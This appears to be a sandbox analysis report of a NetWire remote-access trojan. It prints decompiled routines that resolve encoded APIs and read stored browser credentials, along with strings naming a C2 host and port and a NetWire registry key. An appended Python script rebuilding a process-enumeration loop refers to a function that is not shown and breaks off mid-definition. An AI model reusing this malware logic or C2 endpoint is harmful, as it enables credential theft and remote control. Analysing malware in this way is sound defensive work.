                                                          						_v1010 = _t188;
                                                          						L0041F924();
                                                          						_v1064 = _t188;
                                                          						_v1068 = "%s:%u";
                                                          						_v1072 = 0x40;
                                                          						_v1060 = _v1014 & 0x0000ffff;
                                                          						_v1076 =  &_v988;
                                                          						E004127A8();
                                                          						_t192 = _v1012 + _t217;
                                                          						_t193 =  *(_t192 + 0x14) & 0x0000ffff;
                                                          						_v1076 = _t193;
                                                          						L0041F914();
                                                          						_v1080 =  *((intOrPtr*)(_t192 + 0x10));
                                                          						_v1018 = _t193;
                                                          						L0041F924();
                                                          						_v1072 = _t193;
                                                          						_v1076 = "%s:%u";
                                                          						_v1080 = 0x40;
                                                          						_v1084 = _t236;
                                                          						_v1068 = _v1022 & 0x0000ffff;
                                                          						_t231 =  &_v868;
                                                          						E004127A8(_t222, _t224, _t222, _t224);
                                                          						_v1076 = 0x104;
                                                          						E00402570(_t222, _t224, __eflags, ( &(_v1020[_t217]))[0x18], _t231);
                                                          						_v1056 = E004081AA( *((intOrPtr*)(0x422ca0 + ( &(_v1020[_t217]))[4] * 4)));
                                                          						_v1060 = _t236;
                                                          						_v1064 =  &_v996;
                                                          						_t219 =  &_v608;
                                                          						_v1072 = _t231;
                                                          						_v1076 = 0x422bed;
                                                          						_v1080 = 0x204;
                                                          						_v1084 = _t219;
                                                          						_v1068 = ( &(_v1020[_t217]))[0x18];
                                                          						_t206 = E004127A8();
                                                          						__eflags = _t206;
                                                          						if(_t206 > 0) {
                                                          							E00412458( &_v1008, _t224,  &_v1008, _t219, _t206);
                                                          						}
                                                          						_t234 = _t234 + 1;
                                                          						__eflags = _t234;
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}
                                                          0x0040262f
                                                          0x0040262f
                                                          0x00402633
                                                          0x00402648
                                                          0x00402654
                                                          0x00402659
                                                          0x00402660
                                                          0x00402664
                                                          0x00402669
                                                          0x00402670
                                                          0x00402674
                                                          0x00402679
                                                          0x00402680
                                                          0x00402694
                                                          0x00402699
                                                          0x004026a0
                                                          0x004026b2
                                                          0x004026b7
                                                          0x004026be
                                                          0x004026d2
                                                          0x004026d9
                                                          0x004026f2
                                                          0x004026f2
                                                          0x00402701
                                                          0x00402704
                                                          0x00402706
                                                          0x00402a74
                                                          0x00402a79
                                                          0x00402a7d
                                                          0x00402a9d
                                                          0x00402aa5
                                                          0x00402aad
                                                          0x00402a7f
                                                          0x00402a87
                                                          0x00402a8f
                                                          0x00402a97
                                                          0x00402a97
                                                          0x00402abf
                                                          0x00402ac7
                                                          0x00402ad3
                                                          0x00402adf
                                                          0x00402afa
                                                          0x00402714
                                                          0x00402714
                                                          0x00402718
                                                          0x00402720
                                                          0x00402728
                                                          0x00402730
                                                          0x00402738
                                                          0x00402740
                                                          0x00402744
                                                          0x0040274b
                                                          0x0040274d
                                                          0x00402753
                                                          0x004028fa
                                                          0x004028fa
                                                          0x004028fe
                                                          0x00402906
                                                          0x0040290e
                                                          0x00402916
                                                          0x0040291e
                                                          0x00402926
                                                          0x0040292a
                                                          0x00402931
                                                          0x00402935
                                                          0x0040293b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402941
                                                          0x00402945
                                                          0x00402948
                                                          0x0040294f
                                                          0x00402953
                                                          0x00000000
                                                          0x00000000
                                                          0x00402959
                                                          0x00402961
                                                          0x00402969
                                                          0x00402971
                                                          0x00402979
                                                          0x0040297d
                                                          0x00402980
                                                          0x00402984
                                                          0x00402989
                                                          0x00402a61
                                                          0x00402a66
                                                          0x00402a6f
                                                          0x00402a6f
                                                          0x00000000
                                                          0x00402a66
                                                          0x0040298f
                                                          0x00402991
                                                          0x00402a55
                                                          0x00402a55
                                                          0x00402a5b
                                                          0x00000000
                                                          0x00000000
                                                          0x0040299d
                                                          0x004029a0
                                                          0x004029a5
                                                          0x004029a9
                                                          0x004029ac
                                                          0x004029b2
                                                          0x004029b5
                                                          0x004029ba
                                                          0x004029c5
                                                          0x004029cd
                                                          0x004029d5
                                                          0x004029dd
                                                          0x004029e1
                                                          0x004029e4
                                                          0x004029ed
                                                          0x004029f5
                                                          0x004029fe
                                                          0x00402a01
                                                          0x00402a0e
                                                          0x00402a15
                                                          0x00402a1c
                                                          0x00402a20
                                                          0x00402a28
                                                          0x00402a30
                                                          0x00402a33
                                                          0x00402a37
                                                          0x00402a3c
                                                          0x00402a3e
                                                          0x00402a40
                                                          0x00402a48
                                                          0x00402a4c
                                                          0x00402a4f
                                                          0x00402a4f
                                                          0x00402a54
                                                          0x00402a54
                                                          0x00402a54
                                                          0x00000000
                                                          0x00402a55
                                                          0x00402759
                                                          0x0040275d
                                                          0x00402760
                                                          0x00402767
                                                          0x0040276b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402771
                                                          0x00402779
                                                          0x00402781
                                                          0x00402789
                                                          0x00402791
                                                          0x00402795
                                                          0x00402798
                                                          0x0040279a
                                                          0x0040279f
                                                          0x004028e7
                                                          0x004028ec
                                                          0x004028f5
                                                          0x004028f5
                                                          0x00000000
                                                          0x004028ec
                                                          0x004027a5
                                                          0x004027a7
                                                          0x004028db
                                                          0x004028db
                                                          0x004028e1
                                                          0x00000000
                                                          0x00000000
                                                          0x004027b3
                                                          0x004027b6
                                                          0x004027bb
                                                          0x004027bf
                                                          0x004027c2
                                                          0x004027c8
                                                          0x004027cb
                                                          0x004027d0
                                                          0x004027db
                                                          0x004027e3
                                                          0x004027eb
                                                          0x004027f3
                                                          0x004027f7
                                                          0x004027fa
                                                          0x00402803
                                                          0x00402808
                                                          0x0040280c
                                                          0x0040280f
                                                          0x00402815
                                                          0x00402818
                                                          0x0040281d
                                                          0x00402828
                                                          0x0040282c
                                                          0x00402834
                                                          0x0040283c
                                                          0x0040283f
                                                          0x00402843
                                                          0x0040284a
                                                          0x00402853
                                                          0x00402867
                                                          0x00402888
                                                          0x00402890
                                                          0x00402894
                                                          0x0040289b
                                                          0x004028a2
                                                          0x004028a6
                                                          0x004028ae
                                                          0x004028b6
                                                          0x004028b9
                                                          0x004028bd
                                                          0x004028c2
                                                          0x004028c4
                                                          0x004028d5
                                                          0x004028d5
                                                          0x004028da
                                                          0x004028da
                                                          0x004028da
                                                          0x00000000
                                                          0x004028db

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s:%d$%s:%u$@$Ed590WYd66XlCnd_4idLCldD$Ed5jf5dRSdSqYsqCVid$Ed5jf5dRSdSuSsqCVid$iphlpapi.dll$kernel32.dll$psapi.dll
                                                          • API String ID: 0-1859760768
                                                          • Opcode ID: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
                                                          • Instruction ID: 64c6eb304da1bd60933a222d55b1bae016526deff2b752f498ff56c04a6099ea
                                                          • Opcode Fuzzy Hash: ecfa040b99fdd072a25a0974f1507886e54ec2cabcd5e23ee5df752222c6d893
                                                          • Instruction Fuzzy Hash: 28D1A3B4908341ABC710AF65C58965EFBF0BF84748F418C2EF8C897291D7B9D988CB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $ $%Rand%$HostId$HostId-GqOyO6$Install Date$SOFTWARE\NetWire
                                                          • API String ID: 0-1518357408
                                                          • Opcode ID: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
                                                          • Instruction ID: 4d253b419a98ff4c59b7894da0d5b96d3c68cf9a0106b0f9d5c8600cdd8dc3cd
                                                          • Opcode Fuzzy Hash: 8d9fa1ce1227cd48d07afd670ca600cc309de693e6a65e3e096cff891438ab6d
                                                          • Instruction Fuzzy Hash: BE3193B0109311ABD700AF11D68929FBBE1AF80748F51CC1EE5D85B256D7FE8588CB9B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $/$A$E$K$Software\Microsoft\Internet Explorer\IntelliForms\Storage2$rb+
                                                          • API String ID: 0-417429986
                                                          • Opcode ID: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
                                                          • Instruction ID: b3a366508a3bf55356eea0268f728a85e1b25c4e3c11778993a5dcbc8714eb01
                                                          • Opcode Fuzzy Hash: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
• Instruction Fuzzy Hash: B2A1C2B09083419BD710EFA5C18465BBBE0AF85358F00882EF5D897391D7B9D989DF4A
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
Yara matches
Similarity
• API ID:
• String ID: %$%$%s\%s.%s$TEMP$\$s$s
• API String ID: 0-3075679649
• Opcode ID: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
• Instruction ID: f04d716bfdf1a3b2f19b14ba05fef692e22545d8b3c1490e52eb58049ae1adaa
• Opcode Fuzzy Hash: 89cb20cf2dea8ad77aae30bef6cdbecb0b37b5e693641a521aedb572dfca6291
• Instruction Fuzzy Hash: 435196B040C385DEE720EF25D54879EBBE0BF84348F408D2EE5D887281E7B99588DB56
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
Yara matches
Similarity
• API ID:
• String ID: &$000$001$075$HostId-GqOyO6$Password$podzeye.duckdns.org:6688;
• API String ID: 0-718410314
• Opcode ID: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
• Instruction ID: d012676997c43d0a4f60e6223c36ad427c2154accf07b5176cb32dd979716e27
• Opcode Fuzzy Hash: 35587c5c701385df943a746cf7bb302fd0de4502a5840f6354f21f0f9562dd1c
• Instruction Fuzzy Hash: 3E3100B0109711AAD300EF56D2D925EBEE0BF84748F91CC2EE1C94B251C7F985C99B97
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 15%
                                                          			E0040DCE9(signed int __edx, void* _a4) {
                                                          				intOrPtr* _v52;
                                                          				char _v488;
                                                          				char _v492;
                                                          				char _v684;
                                                          				char _v908;
                                                          				char _v1032;
                                                          				char _v1036;
                                                          				void _v1068;
                                                          				void _v1084;
                                                          				void _v1092;
                                                          				void _v1096;
                                                          				void _v1100;
                                                          				void _v1104;
                                                          				void _v1108;
                                                          				char _v1132;
                                                          				char _v1136;
                                                          				char _v1148;
                                                          				char _v1156;
                                                          				char _v1160;
                                                          				char _v1164;
                                                          				char _v1168;
                                                          				intOrPtr _v1172;
                                                          				intOrPtr _v1176;
                                                          				char* _v1180;
                                                          				signed int _v1188;
                                                          				intOrPtr* _v1196;
                                                          				intOrPtr _v1204;
                                                          				signed int _v1212;
                                                          				signed int _v1220;
                                                          				char* _v1224;
                                                          				void _v1228;
                                                          				void _v1232;
                                                          				void _v1236;
                                                          				signed char _v1240;
                                                          				void* _v1244;
                                                          				signed char _v1248;
                                                          				intOrPtr _v1252;
                                                          				void _v1256;
                                                          				void _v1264;
                                                          				void _v1268;
                                                          				signed char _v1272;
                                                          				char* _v1276;
                                                          				signed char _v1280;
                                                          				intOrPtr _v1284;
                                                          				void _v1288;
                                                          				void _v1296;
                                                          				char* _v1300;
                                                          				signed char _v1304;
                                                          				char* _v1308;
                                                          				signed char _v1312;
                                                          				intOrPtr _v1316;
                                                          				void _v1320;
                                                          				void _v1324;
                                                          				void _v1328;
                                                          				void* _v1332;
                                                          				void _v1336;
                                                          				void _v1340;
                                                          				char _v1344;
                                                          				char _v1348;
                                                          				signed char _v1352;
                                                          				signed char _v1356;
                                                          				void _v1360;
                                                          				signed char _v1364;
                                                          				signed char _v1368;
                                                          				void _v1372;
                                                          				signed char _v1376;
                                                          				void _v1380;
                                                          				void _v1384;
                                                          				signed char _v1396;
                                                          				signed char _v1400;
                                                          				char* _v1404;
                                                          				char* _v1408;
                                                          				char* _v1412;
                                                          				char _v1416;
                                                          				char* _t211;
                                                          				char* _t212;
                                                          				intOrPtr* _t213;
                                                          				void* _t214;
                                                          				intOrPtr* _t215;
                                                          				char _t216;
                                                          				void* _t217;
                                                          				signed int _t218;
                                                          				void _t224;
                                                          				void* _t229;
                                                          				void* _t233;
                                                          				void* _t250;
                                                          				char* _t251;
                                                          				intOrPtr _t257;
                                                          				void* _t278;
                                                          				void _t279;
                                                          				signed char _t285;
                                                          				void* _t288;
                                                          				intOrPtr* _t289;
                                                          				char* _t290;
                                                          				signed int _t295;
                                                          				signed int _t296;
                                                          				signed int _t297;
                                                          				signed int _t298;
                                                          				signed char _t299;
                                                          				void _t301;
                                                          				signed char _t303;
                                                          				intOrPtr* _t310;
                                                          				signed char _t311;
                                                          				intOrPtr _t312;
                                                          				signed char _t313;
                                                          				char* _t316;
                                                          				void* _t317;
                                                          				char* _t318;
                                                          				signed char _t319;
                                                          				char _t320;
                                                          				void* _t321;
                                                          				char** _t324;
                                                          				void* _t326;
                                                          				void* _t329;
                                                          
                                                          				_t295 = __edx;
                                                          				_v1108 = 0;
                                                          				 *(memcpy( &_v1084, 0x4228a0, 4 << 2)) = 0;
                                                          				_v1104 = 0;
                                                          				_v1100 = 0;
                                                          				_v1096 = 0;
                                                          				_v1092 = 0;
                                                          				memcpy( &_v1068, 0x4228b0, 4 << 2);
                                                          				_t324 = _t321 - 0x48c + 0x18;
                                                          				_t211 = E004081AA("2CQi5Yi4.Sii");
                                                          				_v1180 = _t211;
                                                          				L0041F55C();
                                                          				_t316 = _t211;
                                                          				_t212 = 0;
                                                          				_push(_t288);
                                                          				if(_t316 == 0) {
                                                          					L38:
                                                          					return _t212;
                                                          				}
                                                          				 *_t324 = "zCQi5TsdRzCQi5";
                                                          				_t213 = E004081AA();
                                                          				 *_t324 = _t316;
                                                          				_v1180 = _t213;
                                                          				L0041F5AC();
                                                          				_push(_t295);
                                                          				_t310 = _t213;
                                                          				 *_t324 = "zCQi5PiW6dzCQi5";
                                                          				_t214 = E004081AA(_t295);
                                                          				 *_t324 = _t316;
                                                          				_v1188 = _t214;
                                                          				L0041F5AC();
                                                          				_push(0);
                                                          				 *_t324 = "zCQi5jRQld0C5dX5dl6";
                                                          				_v1148 = _t214;
                                                          				_t215 = E004081AA(0);
                                                          				 *_t324 = _t316;
                                                          				_v1196 = _t215;
                                                          				L0041F5AC();
                                                          				_push(_t288);
                                                          				_t289 = _t215;
                                                          				 *_t324 = "zCQi5Ed5X5dl";
                                                          				_t216 = E004081AA(_t288);
                                                          				 *_t324 = _t316;
                                                          				_v1204 = _t216;
                                                          				L0041F5AC();
                                                          				_push(_t317);
                                                          				 *_t324 = "zCQi5Ed5X5dl";
                                                          				_v1160 = _t216;
                                                          				_t217 = E004081AA(_t317);
                                                          				 *_t324 = _t316;
                                                          				_v1212 = _t217;
                                                          				L0041F5AC();
                                                          				_push(_t295);
                                                          				_v1224 = "zCQi5_0dd";
                                                          				_v1164 = _t217;
                                                          				_t218 = E004081AA(_t295);
                                                          				_v1224 = _t316;
                                                          				_v1220 = _t218;
                                                          				L0041F5AC();
                                                          				_push(0);
                                                          				_push(0);
                                                          				_t296 = _t295 & 0xffffff00 | _t310 == 0x00000000;
                                                          				_v1188 = _t218;
                                                          				_t297 = _t296 & 0xffffff00 | _v1180 == 0x00000000;
                                                          				_t298 = _t297 & 0xffffff00 | _v1176 == 0x00000000;
                                                          				_t299 = _t298 & 0xffffff00 | _v1172 == 0x00000000;
                                                          				if((_t218 & 0xffffff00 | _t289 == 0x00000000 | _t296 | _t297 | _t298 | _t299) != 0 || _v1188 == 0) {
                                                          					L3:
                                                          					_t290 = 0;
                                                          					goto L33;
                                                          				} else {
                                                          					_v1228 = 0;
                                                          					_v1224 =  &_v1156;
                                                          					_v1232 =  &_v1136;
                                                          					_t229 =  *_t310();
                                                          					_t324 = _t324 - 0xc;
                                                          					if(_t229 != 0) {
                                                          						goto L3;
                                                          					}
                                                          					_v1240 = 0x200;
                                                          					_v1232 =  &_v1160;
                                                          					_v1236 =  &_v1164;
                                                          					_v1244 = _v1168;
                                                          					_t233 =  *_t289();
                                                          					_t324 = _t324 - 0x10;
                                                          					if(_t233 != 0 || _v1180 == 0) {
                                                          						goto L3;
                                                          					} else {
                                                          						if(E004132E6(0, _t299) != 0xa) {
                                                          							if(E004132E6(0, _t299) == 0xc || E004132E6(0, _t299) == 0xb || E004132E6(0, _t299) == 0xe || E004132E6(0, _t299) == 0xd || E004132E6(0, _t299) == 0xf) {
                                                          								goto L8;
                                                          							} else {
                                                          								_v1212 = 0;
                                                          								_t290 = 0;
                                                          								while(_v1212 < _v1180) {
                                                          									_v1252 = 0x10;
                                                          									_t299 = _v1212 * 0x34 + _v1176;
                                                          									_v1256 =  &_v1148;
                                                          									 *_t324 = _t299;
                                                          									_t313 = _t299;
                                                          									if(E004129C0() == 0) {
                                                          										_v1232 = 0;
                                                          										_v1236 = 0;
                                                          										_v1240 = 0x100;
                                                          										_v1248 = 0xffffffff;
                                                          										_v1244 =  &_v1132;
                                                          										_v1256 = 0;
                                                          										 *_t324 = 0;
                                                          										_v1252 =  *((intOrPtr*)(_t313 + 0x10));
                                                          										L0041F4DC();
                                                          										_t329 = _t324 - 0x20;
                                                          										_v1264 = 0;
                                                          										_v1268 = 0;
                                                          										_v1272 = 0x100;
                                                          										_v1280 = 0xffffffff;
                                                          										_v1276 =  &_v908;
                                                          										_v1288 = 0;
                                                          										 *_t329 = 0;
                                                          										_v1284 =  *((intOrPtr*)(_t313 + 0x14)) + 0x20;
                                                          										L0041F4DC();
                                                          										_t319 =  &_v684;
                                                          										_v1296 = 0;
                                                          										_v1300 = 0;
                                                          										_v1304 = 0x100;
                                                          										_v1312 = 0xffffffff;
                                                          										_v1308 = _t319;
                                                          										_v1320 = 0;
                                                          										_v1324 = 0;
                                                          										_v1316 =  *((intOrPtr*)(_t313 + 0x18)) + 0x20;
                                                          										L0041F4DC();
                                                          										_v1336 = 0;
                                                          										_v1340 = 0;
                                                          										_v1268 = 0;
                                                          										_v1332 =  &_v1268;
                                                          										_v1344 =  *((intOrPtr*)(_t313 + 0x18));
                                                          										_v1352 = _t313;
                                                          										_v1348 =  *((intOrPtr*)(_t313 + 0x14));
                                                          										_v1356 = _v1280;
                                                          										_t278 = _v1300();
                                                          										_t324 = _t329 - 0xffffffffffffffe4;
                                                          										if(_t278 == 0) {
                                                          											_t303 =  &_v488;
                                                          											_v1356 = 0;
                                                          											_v1360 = 0;
                                                          											_v1364 = 0x100;
                                                          											_v1368 = _t303;
                                                          											_v1372 = 0xffffffff;
                                                          											_v1380 = 0;
                                                          											_v1384 = 0;
                                                          											_v1324 = _t303;
                                                          											_v1376 =  *((intOrPtr*)(_v1296 + 0x1c)) + 0x20;
                                                          											L0041F4DC();
                                                          											_t324 = _t324 - 0x20;
                                                          											_t299 = _v1356;
                                                          											_v1400 = _t319;
                                                          											_t320 =  &_v1324;
                                                          											_v1408 = 2;
                                                          											_v1412 = 0x4239a1;
                                                          											_v1404 =  &_v1032;
                                                          											_v1324 = 0;
                                                          											_v1396 = _t299;
                                                          											_v1416 = _t320;
                                                          											_t285 = E00412755( &_v1032);
                                                          											_t313 = _t285;
                                                          											if(_t285 != 0xffffffff) {
                                                          												_v1404 = _t285;
                                                          												_v1412 = _t290;
                                                          												_v1400 = 1;
                                                          												_v1408 = _t320;
                                                          												_t290 = _t290 + _t313;
                                                          												_v1416 =  &_v1344;
                                                          												_v1344 = E00412ABF(0);
                                                          											}
                                                          										}
                                                          										_t279 = _v1296;
                                                          										if(_t279 != 0) {
                                                          											_v1384 = _t279;
                                                          											_v1340();
                                                          											_push(_t313);
                                                          										}
                                                          									}
                                                          									_v1336 =  &(1[_v1336]);
                                                          								}
                                                          								L33:
                                                          								_t224 = _v1148;
                                                          								if(_t224 != 0) {
                                                          									_v1232 = _t224;
                                                          									_t224 = _v1188();
                                                          									_push(0);
                                                          								}
                                                          								if(_v1156 != 0) {
                                                          									_v1232 =  &_v1156;
                                                          									_t224 = _v1180();
                                                          									_push(_t299);
                                                          								}
                                                          								_v1232 = _t316;
                                                          								L0041F614();
                                                          								_push(_t224);
                                                          								 *_v52 = _t290;
                                                          								_t212 = _v1164;
                                                          								goto L38;
                                                          							}
                                                          						}
                                                          						L8:
                                                          						_v1212 = 0;
                                                          						_t290 = 0;
                                                          						while(_v1212 < _v1180) {
                                                          							_v1252 = 0x10;
                                                          							_t299 = _v1212 * 0x38 + _v1176;
                                                          							_v1256 =  &_v1148;
                                                          							 *_t324 = _t299;
                                                          							_t311 = _t299;
                                                          							if(E004129C0() == 0) {
                                                          								_v1232 = 0;
                                                          								_v1236 = 0;
                                                          								_v1240 = 0x100;
                                                          								_v1248 = 0xffffffff;
                                                          								_v1244 =  &_v1132;
                                                          								_v1256 = 0;
                                                          								 *_t324 = 0;
                                                          								_v1252 =  *((intOrPtr*)(_t311 + 0x10));
                                                          								L0041F4DC();
                                                          								_t326 = _t324 - 0x20;
                                                          								_v1264 = 0;
                                                          								_v1268 = 0;
                                                          								_v1272 = 0x100;
                                                          								_v1280 = 0xffffffff;
                                                          								_v1276 =  &_v908;
                                                          								_v1288 = 0;
                                                          								 *_t326 = 0;
                                                          								_v1284 =  *((intOrPtr*)(_t311 + 0x14)) + 0x20;
                                                          								L0041F4DC();
                                                          								_t318 =  &_v684;
                                                          								_v1296 = 0;
                                                          								_v1300 = 0;
                                                          								_v1304 = 0x100;
                                                          								_v1312 = 0xffffffff;
                                                          								_v1308 = _t318;
                                                          								_v1320 = 0;
                                                          								_v1324 = 0;
                                                          								_v1316 =  *((intOrPtr*)(_t311 + 0x18)) + 0x20;
                                                          								L0041F4DC();
                                                          								_v1332 = 0;
                                                          								_v1336 = 0;
                                                          								_v1340 = 0;
                                                          								_v1268 = 0;
                                                          								_v1328 =  &_v1268;
                                                          								_v1344 =  *((intOrPtr*)(_t311 + 0x18));
                                                          								_v1352 = _t311;
                                                          								_v1348 =  *((intOrPtr*)(_t311 + 0x14));
                                                          								_v1356 = _v1280;
                                                          								_t250 = _v1296();
                                                          								_t324 = _t326 - 0xffffffffffffffe0;
                                                          								if(_t250 == 0) {
                                                          									_t301 =  &_v492;
                                                          									_v1360 = 0;
                                                          									_v1364 = 0;
                                                          									_v1368 = 0x100;
                                                          									_v1372 = _t301;
                                                          									_v1376 = 0xffffffff;
                                                          									_v1384 = 0;
                                                          									 *_t324 = 0;
                                                          									_v1332 = _t301;
                                                          									_v1380 = _v1300[0x1c] + 0x20;
                                                          									L0041F4DC();
                                                          									_t324 = _t324 - 0x20;
                                                          									_t299 = _v1364;
                                                          									_v1404 = _t318;
                                                          									_t318 =  &_v1328;
                                                          									_v1412 = 2;
                                                          									_v1416 = 0x4239a1;
                                                          									_v1408 =  &_v1036;
                                                          									_v1328 = 0;
                                                          									_v1400 = _t299;
                                                          									 *_t324 = _t318;
                                                          									_t257 = E00412755( &_v1036);
                                                          									_t312 = _t257;
                                                          									if(_t257 != 0xffffffff) {
                                                          										_v1408 = _t257;
                                                          										_v1416 = _t290;
                                                          										_v1404 = 1;
                                                          										_v1412 = _t318;
                                                          										_t290 = _t290 + _t312;
                                                          										 *_t324 =  &_v1348;
                                                          										_v1348 = E00412ABF(0);
                                                          									}
                                                          								}
                                                          								_t251 = _v1300;
                                                          								if(_t251 != 0) {
                                                          									 *_t324 = _t251;
                                                          									_v1344();
                                                          									_push(_t318);
                                                          								}
                                                          							}
                                                          							_v1340 =  &(1[_v1340]);
                                                          						}
                                                          						goto L33;
                                                          					}
                                                          				}
                                                          			}
Instruction addresses for the listing above (decompiler side column, 0x0040dce9 to 0x0040e3b4, detached from the C lines by extraction and not reproduced here).

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2CQi5Yi4.Sii$zCQi5Ed5X5dl$zCQi5PiW6dzCQi5$zCQi5TsdRzCQi5$zCQi5_0dd$zCQi5jRQld0C5dX5dl6
                                                          • API String ID: 0-1136301387
                                                          • Opcode ID: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
                                                          • Instruction ID: 0411f2c87eaa10a6bc819440aee1928311a11f64f3fd3897648e7812cf6e01f9
                                                          • Opcode Fuzzy Hash: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
                                                          • Instruction Fuzzy Hash: 6802ADB04087419FD310EF6AC58875BBBE4BF84358F108D2EF4948B291E7B9D5898F96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
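
The function E0040FE8C listed next walks the process list: it stores 0x128 as the first field of a stack record (the size of an ANSI PROCESSENTRY32 in a 32-bit build), opens each process with access mask 0x410 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ) and resolves one export by a decoded name from psapi.dll, falling back to kernel32.dll. The script below is an added example written for this report, not the sample's code and not Joe Sandbox output. It rebuilds that loop with ctypes so the constants can be checked against real Win32 definitions. The API names CreateToolhelp32Snapshot, Process32First/Next, OpenProcess and GetModuleFileNameExA are inferred from those constants; the report itself does not name them, and the process blocklist and sample entries are constructed for the offline check.

```python
# Added example for this report, not the sample's code. API names are inferences from the
# constants in E0040FE8C (0x128 -> PROCESSENTRY32, 0x410 -> OpenProcess access mask); the
# report does not name them. GetModuleFileNameExA stands in for the psapi.dll export whose
# (encoded) name the sample resolves: it needs exactly QUERY_INFORMATION | VM_READ.
import ctypes
import sys

TH32CS_SNAPPROCESS = 0x00000002
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
ACCESS_MASK_SEEN = 0x410                          # _v1516 in the decompiled loop
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value  # 0xffffffff on the 32-bit build analysed
MAX_PATH = 260

PROCESS_RIGHT_NAMES = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def decode_access_mask(mask):
    """Name the rights in an OpenProcess access mask, lowest bit first; unknown bits stay hex."""
    names = [name for bit, name in sorted(PROCESS_RIGHT_NAMES.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHT_NAMES)
    return names + ([hex(unknown)] if unknown else [])


def make_processentry32(pointer_bytes):
    """ANSI PROCESSENTRY32 for a given pointer width (th32DefaultHeapID is a ULONG_PTR)."""
    ulong_ptr = ctypes.c_uint32 if pointer_bytes == 4 else ctypes.c_uint64

    class PROCESSENTRY32(ctypes.Structure):
        _fields_ = [("dwSize", ctypes.c_uint32), ("cntUsage", ctypes.c_uint32),
                    ("th32ProcessID", ctypes.c_uint32), ("th32DefaultHeapID", ulong_ptr),
                    ("th32ModuleID", ctypes.c_uint32), ("cntThreads", ctypes.c_uint32),
                    ("th32ParentProcessID", ctypes.c_uint32), ("pcPriClassBase", ctypes.c_int32),
                    ("dwFlags", ctypes.c_uint32), ("szExeFile", ctypes.c_char * MAX_PATH)]
    return PROCESSENTRY32


def processentry32_size(pointer_bytes):
    """sizeof(PROCESSENTRY32) for that pointer width: 0x128 with 4-byte pointers, as in the sample."""
    return ctypes.sizeof(make_processentry32(pointer_bytes))


def walk_processes():
    """Windows only: snapshot -> Process32First/Next -> OpenProcess(0x410) -> image path.
    Returns [(pid, exe_name, image_path_or_None)], the same data the sample's loop collects."""
    if sys.platform != "win32":
        raise OSError("walk_processes() needs the Win32 API")
    entry_t = make_processentry32(ctypes.sizeof(ctypes.c_void_p))
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateToolhelp32Snapshot.restype = ctypes.c_void_p
    k32.CreateToolhelp32Snapshot.argtypes = [ctypes.c_uint32, ctypes.c_uint32]
    for fn in (k32.Process32First, k32.Process32Next):
        fn.restype, fn.argtypes = ctypes.c_int, [ctypes.c_void_p, ctypes.POINTER(entry_t)]
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
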